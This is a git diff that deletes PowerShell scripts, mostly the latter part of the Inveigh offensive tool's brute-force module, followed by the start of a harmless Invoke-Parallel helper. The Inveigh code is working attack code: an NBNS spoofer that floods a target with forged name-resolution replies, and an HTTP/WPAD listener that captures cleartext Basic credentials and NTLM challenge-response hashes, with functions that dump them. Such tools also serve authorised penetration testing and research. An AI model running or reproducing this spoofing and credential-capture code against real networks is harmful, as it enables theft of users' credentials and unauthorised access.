$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address)]) - $inveigh.cleartext_file_queue.Add($cleartext_credentials) - $inveigh.cleartext_list.Add($cleartext_credentials) - $inveigh.console_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials $cleartext_credentials captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address) - - if($inveigh.file_output) - { - $inveigh.console_queue.Add("Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file) - } - - } - - $HTTP_timestamp = Get-Date -format r - $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp) - - if((($WPADIP -and $WPADPort) -or $WPADResponse) -and $HTTP_request_raw_URL -match '/wpad.dat') - { - $HTTP_message = $HTTP_WPAD_response - } - elseif($HTTPResponse -and $HTTP_request_raw_URL -notmatch '/wpad.dat') - { - $HTTP_message = $HTTPResponse - } - else - { - $HTTP_message = '' - - } - - $HTTP_timestamp = Get-Date -format r - $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp) - - if(($HTTPAuth -eq 'NTLM' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -eq 'NTLM' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$NTLM_auth) - { - $NTLM = [System.Text.Encoding]::UTF8.GetBytes($NTLM) - $HTTP_message_bytes = 0x0d,0x0a - $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length) - $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message) - - $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 + - $HTTP_response_status_code + - 0x20 + - $HTTP_response_phrase + - 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73, - 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d, - 0x0a,0x44,0x61,0x74,0x65,0x3a + - $HTTP_timestamp + - 0x0d,0x0a + - $HTTP_WWW_authenticate_header + - $NTLM + - 0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20, - 0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73, - 0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e, - 0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + - $HTTP_content_length_bytes + - 0x0d,0x0a + - $HTTP_message_bytes - - } - elseif(($HTTPAuth -eq 'Basic' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $HTTP_request_raw_URL -match '/wpad.dat')) - { - $Basic = [System.Text.Encoding]::UTF8.GetBytes("Basic realm=$HTTPBasicRealm") - $HTTP_message_bytes = 0x0d,0x0a - $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length) - $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message) - $HTTP_client_close = $true - - $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 + - $HTTP_response_status_code + - 0x20 + - $HTTP_response_phrase + - 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73, - 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d, - 0x0a,0x44,0x61,0x74,0x65,0x3a + - $HTTP_timestamp + - 0x0d,0x0a + - $HTTP_WWW_authenticate_header + - $Basic + - 0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20, - 0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73, - 0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e, - 0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + - $HTTP_content_length_bytes + - 0x0d,0x0a + - $HTTP_message_bytes - - } - else - { - $HTTP_response_status_code = 0x32,0x30,0x30 - $HTTP_response_phrase = 0x4f,0x4b - $HTTP_message_bytes = 0x0d,0x0a - $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length) - $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message) - $HTTP_client_close = $true - - $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 + - $HTTP_response_status_code + - 0x20 + - $HTTP_response_phrase + - 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73, - 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d, - 0x0a,0x44,0x61,0x74,0x65,0x3a + - $HTTP_timestamp + - 0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20, - 0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73, - 0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e, - 0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + - $HTTP_content_length_bytes + - 0x0d,0x0a + - $HTTP_message_bytes - } - - $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length) - $HTTP_stream.Flush() - Start-Sleep -m 10 - $HTTP_request_raw_URL_old = $HTTP_request_raw_URL - $HTTP_client_handle_old = $inveigh.HTTP_client.Client.Handle - - if($HTTP_client_close) - { - $inveigh.HTTP_client.Close() - - if($RunCount -gt 0 -and ($inveigh.NTLMv1_list.Count -ge $run_count_NTLMv1 -or $inveigh.NTLMv2_list.Count -ge $run_count_NTLMv2 -or $inveigh.cleartext_list.Count -ge $run_count_cleartext)) - { - HTTPListenerStop - $inveigh.console_queue.Add("Inveigh Brute Force exited due to run count at $(Get-Date -format 's')") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Brute Force exited due to run count")]) - $inveigh.bruteforce_running = $false - } - - } - - $HTTP_client_close = $false - } - -} - -$spoofer_scriptblock = -{ - param ($SpooferIP,$Hostname,$SpooferTarget,$NBNSPause,$NBNSTTL) - - $Hostname = $Hostname.ToUpper() - - $hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41, - 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00 - - $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($Hostname) - $hostname_encoded = [System.BitConverter]::ToString($hostname_encoded) - $hostname_encoded = $hostname_encoded.Replace("-","") - $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded) - $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) - [Array]::Reverse($NBNS_TTL_bytes) - - for($i=0; $i -lt $hostname_encoded.Count; $i++) - { - - if($hostname_encoded[$i] -gt 64) - { - $hostname_bytes[$i] = $hostname_encoded[$i] + 10 - } - else - { - $hostname_bytes[$i] = $hostname_encoded[$i] + 17 - } - - } - - $NBNS_response_packet = 0x00,0x00,0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + - $hostname_bytes + - 0x00,0x20,0x00,0x01 + - $NBNS_TTL_bytes + - 0x00,0x06,0x00,0x00 + - ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + - 0x00,0x00,0x00,0x00 - - $inveigh.console_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $Hostname on $SpooferTarget") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $Hostname on $SpooferTarget")]) - $NBNS_paused = $false - $send_socket = New-Object System.Net.Sockets.UdpClient(137) - $destination_IP = [System.Net.IPAddress]::Parse($SpooferTarget) - $destination_point = New-Object Net.IPEndpoint($destination_IP,137) - $send_socket.Connect($destination_point) - - while($inveigh.bruteforce_running) - { - - :NBNS_spoofer_loop while (!$inveigh.hostname_spoof -and $inveigh.bruteforce_running) - { - - if($NBNS_paused) - { - $inveigh.console_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")]) - $NBNS_paused = $false - } - - for ($i = 0; $i -lt 255; $i++) - { - - for ($j = 0; $j -lt 255; $j++) - { - $NBNS_response_packet[0] = $i - $NBNS_response_packet[1] = $j - $send_socket.send( $NBNS_response_packet,$NBNS_response_packet.Length) - - if($inveigh.hostname_spoof -and $NBNSPause) - { - $inveigh.console_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")]) - $NBNS_paused = $true - break NBNS_spoofer_loop - } - - } - - } - - } - - Start-Sleep -m 5 - } - - $send_socket.Close() - } - -$control_bruteforce_scriptblock = -{ - param ($NBNSPause,$RunTime) - - if($RunTime) - { - $control_timeout = new-timespan -Minutes $RunTime - $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() - } - - if($NBNSPause) - { - $NBNS_pause = new-timespan -Seconds $NBNSPause - } - - while ($inveigh.bruteforce_running) - { - - if($RunTime) - { - - if($control_stopwatch.Elapsed -ge $control_timeout) - { - - if($inveigh.HTTP_listener.IsListening) - { - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() - } - - if($inveigh.bruteforce_running) - { - HTTPListenerStop - $inveigh.console_queue.Add("Inveigh Brute Force exited due to run time at $(Get-Date -format 's')") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Brute Force exited due to run time")]) - Start-Sleep -m 5 - $inveigh.bruteforce_running = $false - } - - if($inveigh.relay_running) - { - $inveigh.console_queue.Add("Inveigh Relay exited due to run time at $(Get-Date -format 's')") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to run time")]) - Start-Sleep -m 5 - $inveigh.relay_running = $false - } - - if($inveigh.running) - { - $inveigh.console_queue.Add("Inveigh exited due to run time at $(Get-Date -format 's')") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to run time")]) - Start-Sleep -m 5 - $inveigh.running = $false - } - - } - } - - if($NBNSPause -and $inveigh.hostname_spoof) - { - - if($inveigh.NBNS_stopwatch.Elapsed -ge $NBNS_pause) - { - $inveigh.hostname_spoof = $false - } - - } - - if($inveigh.file_output -and !$inveigh.running) - { - - while($inveigh.log_file_queue.Count -gt 0) - { - $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append - $inveigh.log_file_queue.RemoveRange(0,1) - } - - while($inveigh.NTLMv1_file_queue.Count -gt 0) - { - $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append - $inveigh.NTLMv1_file_queue.RemoveRange(0,1) - } - - while($inveigh.NTLMv2_file_queue.Count -gt 0) - { - $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append - $inveigh.NTLMv2_file_queue.RemoveRange(0,1) - } - - while($inveigh.cleartext_file_queue.Count -gt 0) - { - $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append - $inveigh.cleartext_file_queue.RemoveRange(0,1) - } - - } - - Start-Sleep -m 5 - } - } - -# End ScriptBlocks -# Begin Startup functions - -# HTTP Listener Startup function -function HTTPListener() -{ - - if($HTTPIP) - { - $HTTPIP = [System.Net.IPAddress]::Parse($HTTPIP) - $inveigh.HTTP_endpoint = New-Object System.Net.IPEndPoint($HTTPIP,$HTTPPort) - } - else - { - $inveigh.HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort) - } - - $inveigh.HTTP_listener = New-Object System.Net.Sockets.TcpListener $inveigh.HTTP_endpoint - $inveigh.HTTP_listener.Start() - $HTTP_runspace = [RunspaceFactory]::CreateRunspace() - $HTTP_runspace.Open() - $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) - $HTTP_powershell = [PowerShell]::Create() - $HTTP_powershell.Runspace = $HTTP_runspace - $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null - $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($HTTPAuth).AddArgument($HTTPBasicRealm).AddArgument($HTTPResponse).AddArgument( - $NBNSPause).AddArgument($WPADAuth).AddArgument($WPADIP).AddArgument($WPADPort).AddArgument( - $WPADDirectHosts).AddArgument($WPADResponse).AddArgument($RunCount) > $null - $HTTP_powershell.BeginInvoke() > $null -} - -# Spoofer Startup function -function Spoofer() -{ - $spoofer_runspace = [RunspaceFactory]::CreateRunspace() - $spoofer_runspace.Open() - $spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) - $spoofer_powershell = [PowerShell]::Create() - $spoofer_powershell.Runspace = $spoofer_runspace - $spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null - $spoofer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null - $spoofer_powershell.AddScript($spoofer_scriptblock).AddArgument($SpooferIP).AddArgument($Hostname).AddArgument( - $SpooferTarget).AddArgument($NBNSPause).AddArgument($NBNSTTL) > $null - $spoofer_powershell.BeginInvoke() > $null -} - -# Control Brute Force Startup function -function ControlBruteForceLoop() -{ - $control_bruteforce_runspace = [RunspaceFactory]::CreateRunspace() - $control_bruteforce_runspace.Open() - $control_bruteforce_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) - $control_bruteforce_powershell = [PowerShell]::Create() - $control_bruteforce_powershell.Runspace = $control_bruteforce_runspace - $control_bruteforce_powershell.AddScript($shared_basic_functions_scriptblock) > $null - $control_bruteforce_powershell.AddScript($control_bruteforce_scriptblock).AddArgument($NBNSPause).AddArgument($RunTime) > $null - $control_bruteforce_powershell.BeginInvoke() > $null -} - -# End Startup functions - -# Startup Enabled Services - -# HTTP Server Start -if($HTTP -eq 'Y') -{ - HTTPListener -} - -# Spoofer Start -if($NBNS -eq 'Y') -{ - Spoofer -} - -# Control Brute Force Loop Start -if($NBNSPause -or $RunTime -or $inveigh.file_output) -{ - ControlBruteForceLoop -} - -if($inveigh.console_output) -{ - - :console_loop while(($inveigh.bruteforce_running -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) - { - - while($inveigh.console_queue.Count -gt 0) - { - - if($inveigh.output_stream_only) - { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) - } - else - { - - switch -wildcard ($inveigh.console_queue[0]) - { - - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* written to *" - { - - if($inveigh.file_output) - { - Write-Warning $inveigh.console_queue[0] - } - - $inveigh.console_queue.RemoveRange(0,1) - } - - "* for relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "*SMB relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* local administrator *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - } - - } - - } - - if($inveigh.console_input) - { - - if([Console]::KeyAvailable) - { - $inveigh.console_output = $false - BREAK console_loop - } - - } - - Start-Sleep -m 5 - } - -} - -if($inveigh.file_output -and !$inveigh.running) -{ - - while($inveigh.log_file_queue.Count -gt 0) - { - $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append - $inveigh.log_file_queue.RemoveRange(0,1) - } - - while($inveigh.NTLMv1_file_queue.Count -gt 0) - { - $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append - $inveigh.NTLMv1_file_queue.RemoveRange(0,1) - } - - while($inveigh.NTLMv2_file_queue.Count -gt 0) - { - $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append - $inveigh.NTLMv2_file_queue.RemoveRange(0,1) - } - - while($inveigh.cleartext_file_queue.Count -gt 0) - { - $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append - $inveigh.cleartext_file_queue.RemoveRange(0,1) - } - -} - -} -#End Invoke-InveighBruteForce - -function Stop-Inveigh -{ - <# - .SYNOPSIS - Stop-Inveigh will stop all running Inveigh functions. - #> - - if($inveigh) - { - if($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) - { - - if($inveigh.HTTP_listener.IsListening) - { - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() - } - - if($inveigh.bruteforce_running) - { - $inveigh.bruteforce_running = $false - Write-Output("$(Get-Date -format 's') - Attempting to stop HTTP listener") - $inveigh.HTTP_listener.server.blocking = $false - Start-Sleep -s 1 - $inveigh.HTTP_listener.server.Close() - Start-Sleep -s 1 - $inveigh.HTTP_listener.Stop() - Write-Output("Inveigh Brute Force exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Brute Force exited") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh Brute Force exited" | Out-File $Inveigh.log_out_file -Append - } - - } - - if($inveigh.relay_running) - { - $inveigh.relay_running = $false - Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append - } - - } - - if($inveigh.running) - { - $inveigh.running = $false - Write-Output("Inveigh exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append - } - - } - - } - else - { - Write-Output("There are no running Inveigh functions") - } - - if($inveigh.HTTPS) - { - & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null - - try - { - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.Open('ReadWrite') - $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0] - $certificate_store.Remove($certificate) - $certificate_store.Close() - } - catch - { - Write-Output("SSL Certificate Deletion Error - Remove Manually") - $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append - } - - } - } - - $inveigh.HTTP = $false - $inveigh.HTTPS = $false - } - else - { - Write-Output("There are no running Inveigh functions")|Out-Null - } - -} - -function Get-Inveigh -{ - <# - .SYNOPSIS - Get-Inveigh will display queued Inveigh console output. - #> - - while($inveigh.console_queue.Count -gt 0) - { - - if($inveigh.output_stream_only) - { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) - } - else - { - - switch -wildcard ($inveigh.console_queue[0]) - { - - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* written to *" - { - - if($inveigh.file_output) - { - Write-Warning $inveigh.console_queue[0] - } - - $inveigh.console_queue.RemoveRange(0,1) - } - - "* for relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "*SMB relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* local administrator *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - } - - } - - } - -} - -function Get-InveighCleartext -{ - <# - .SYNOPSIS - Get-InveighCleartext will get all captured cleartext credentials. - - .PARAMETER Unique - Display only unique cleartext credentials. - #> - - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter - ) - - if($Unique) - { - Write-Output $inveigh.cleartext_list | Get-Unique - } - else - { - Write-Output $inveigh.cleartext_list - } - -} - -function Get-InveighNTLMv1 -{ - <# - .SYNOPSIS - Get-InveighNTLMv1 will get captured NTLMv1 challenge/response hashes. - - .PARAMETER Unique - Display only the first captured challenge/response for each unique account. - - .PARAMETER Usernames - Display IP addresses and usernames for captured NTLMv2 challenge response hashes. - #> - - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(Mandatory=$false)][Switch]$Usernames, - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter - ) - - if ($invalid_parameter) - { - throw "$($invalid_parameter) is not a valid parameter." - } - - if($Unique -and $Usernames) - { - throw "Cannot use -Unique with -Usernames." - } - - if($Unique) - { - $inveigh.NTLMv1_list.Sort() - - foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) - { - $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) - - if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) - { - Write-Output $unique_NTLMv1 - } - - $unique_NTLMv1_account_last = $unique_NTLMv1_account - } - } - elseif($Usernames) - { - Write-Output $inveigh.NTLMv1_username_list - } - else - { - Write-Output $inveigh.NTLMv1_list - } - -} - -function Get-InveighNTLMv2 -{ - <# - .SYNOPSIS - Get-InveighNTLMv2 will get captured NTLMv2 challenge/response hashes. - - .PARAMETER Unique - Display only the first captured challenge/response for each unique account. - - .PARAMETER Usernames - Display IP addresses and usernames for captured NTLMv2 challenge response hashes. - #> - - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(Mandatory=$false)][Switch]$Usernames, - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter - ) - - if($invalid_parameter) - { - throw "$($invalid_parameter) is not a valid parameter." - } - - if($Unique -and $Usernames) - { - throw "Cannot use -Unique with -Usernames." - } - - if($Unique) - { - $inveigh.NTLMv2_list.Sort() - - foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) - { - $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) - - if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) - { - Write-Output $unique_NTLMv2 - } - - $unique_NTLMv2_account_last = $unique_NTLMv2_account - } - } - elseif($Usernames) - { - Write-Output $inveigh.NTLMv2_username_list - } - else - { - Write-Output $inveigh.NTLMv2_list - } - -} - -function Get-InveighLog -{ - <# - .SYNOPSIS - Get-InveighLog will get log entries. - #> - - Write-Output $inveigh.log -} - -function Watch-Inveigh -{ - <# - .SYNOPSIS - Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell. - #> - - if($inveigh.tool -ne 1) - { - - if($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) - { - Write-Output "Press any key to stop real time console output" - $inveigh.console_output = $true - - :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) - { - - while($inveigh.console_queue.Count -gt 0) - { - - if($inveigh.output_stream_only) - { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) - } - else - { - - switch -wildcard ($inveigh.console_queue[0]) - { - - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* written to *" - { - - if($inveigh.file_output) - { - Write-Warning $inveigh.console_queue[0] - } - - $inveigh.console_queue.RemoveRange(0,1) - } - - "* for relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "*SMB relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* local administrator *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - } - - } - - } - - if([Console]::KeyAvailable) - { - $inveigh.console_output = $false - BREAK console_loop - } - - Start-Sleep -m 5 - } - - } - else - { - Write-Output "Inveigh isn't running" - } - - } - else - { - Write-Output "Watch-Inveigh cannot be used with current external tool selection" - } - -} - -function Clear-Inveigh -{ - <# - .SYNOPSIS - Clear-Inveigh will clear Inveigh data from memory. - #> - - if($inveigh) - { - - if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.bruteforce_running) - { - Remove-Variable inveigh -scope global - Write-Output "Inveigh data has been cleared from memory" - } - else - { - Write-Output "Run Stop-Inveigh before running Clear-Inveigh" - } - - } - -} diff --git a/scripts/Invoke-Parallel.ps1 b/scripts/Invoke-Parallel.ps1 deleted file mode 100644 index f9930fd..0000000 --- a/scripts/Invoke-Parallel.ps1 +++ /dev/null @@ -1,610 +0,0 @@ -function Invoke-Parallel { - <# - .SYNOPSIS - Function to control parallel processing using runspaces - - .DESCRIPTION - Function to control parallel processing using runspaces - - Note that each runspace will not have access to variables and commands loaded in your session or in other runspaces by default. - This behaviour can be changed with parameters. - - .PARAMETER ScriptFile - File to run against all input objects. Must include parameter to take in the input object, or use $args. Optionally, include parameter to take in parameter. Example: C:\script.ps1 - - .PARAMETER ScriptBlock - Scriptblock to run against all computers. - - You may use $Using: language in PowerShell 3 and later. - - The parameter block is added for you, allowing behaviour similar to foreach-object: - Refer to the input object as $_. - Refer to the parameter parameter as $parameter - - .PARAMETER InputObject - Run script against these specified objects. - - .PARAMETER Parameter - This object is passed to every script block. You can use it to pass information to the script block; for example, the path to a logging folder - - Reference this object as $parameter if using the scriptblock parameterset. - - .PARAMETER ImportVariables - If specified, get user session variables and add them to the initial session state - - .PARAMETER ImportModules - If specified, get loaded modules and pssnapins, add them to the initial session state - - .PARAMETER Throttle - Maximum number of threads to run at a single time. - - .PARAMETER SleepTimer - Milliseconds to sleep after checking for completed runspaces and in a few other spots. I would not recommend dropping below 200 or increasing above 500 - - .PARAMETER RunspaceTimeout - Maximum time in seconds a single thread can run. If execution of your code takes longer than this, it is disposed. Default: 0 (seconds) - - WARNING: Using this parameter requires that maxQueue be set to throttle (it will be by default) for accurate timing. Details here: - http://gallery.technet.microsoft.com/Run-Parallel-Parallel-377fd430 - - .PARAMETER NoCloseOnTimeout - Do not dispose of timed out tasks or attempt to close the runspace if threads have timed out. This will prevent the script from hanging in certain situations where threads become non-responsive, at the expense of leaking memory within the PowerShell host. - - .PARAMETER MaxQueue - Maximum number of powershell instances to add to runspace pool. If this is higher than $throttle, $timeout will be inaccurate - - If this is equal or less than throttle, there will be a performance impact - - The default value is $throttle times 3, if $runspaceTimeout is not specified - The default value is $throttle, if $runspaceTimeout is specified - - .PARAMETER LogFile - Path to a file where we can log results, including run time for each thread, whether it completes, completes with errors, or times out. - - .PARAMETER Quiet - Disable progress bar. - - .EXAMPLE - Each example uses Test-ForPacs.ps1 which includes the following code: - param($computer) - - if(test-connection $computer -count 1 -quiet -BufferSize 16){ - $object = [pscustomobject] @{ - Computer=$computer; - Available=1; - Kodak=$( - if((test-path "\\$computer\c$\users\public\desktop\Kodak Direct View Pacs.url") -or (test-path "\\$computer\c$\documents and settings\all users - - \desktop\Kodak Direct View Pacs.url") ){"1"}else{"0"} - ) - } - } - else{ - $object = [pscustomobject] @{ - Computer=$computer; - Available=0; - Kodak="NA" - } - } - - $object - - .EXAMPLE - Invoke-Parallel -scriptfile C:\public\Test-ForPacs.ps1 -inputobject $(get-content C:\pcs.txt) -runspaceTimeout 10 -throttle 10 - - Pulls list of PCs from C:\pcs.txt, - Runs Test-ForPacs against each - If any query takes longer than 10 seconds, it is disposed - Only run 10 threads at a time - - .EXAMPLE - Invoke-Parallel -scriptfile C:\public\Test-ForPacs.ps1 -inputobject c-is-ts-91, c-is-ts-95 - - Runs against c-is-ts-91, c-is-ts-95 (-computername) - Runs Test-ForPacs against each - - .EXAMPLE - $stuff = [pscustomobject] @{ - ContentFile = "windows\system32\drivers\etc\hosts" - Logfile = "C:\temp\log.txt" - } - - $computers | Invoke-Parallel -parameter $stuff { - $contentFile = join-path "\\$_\c$" 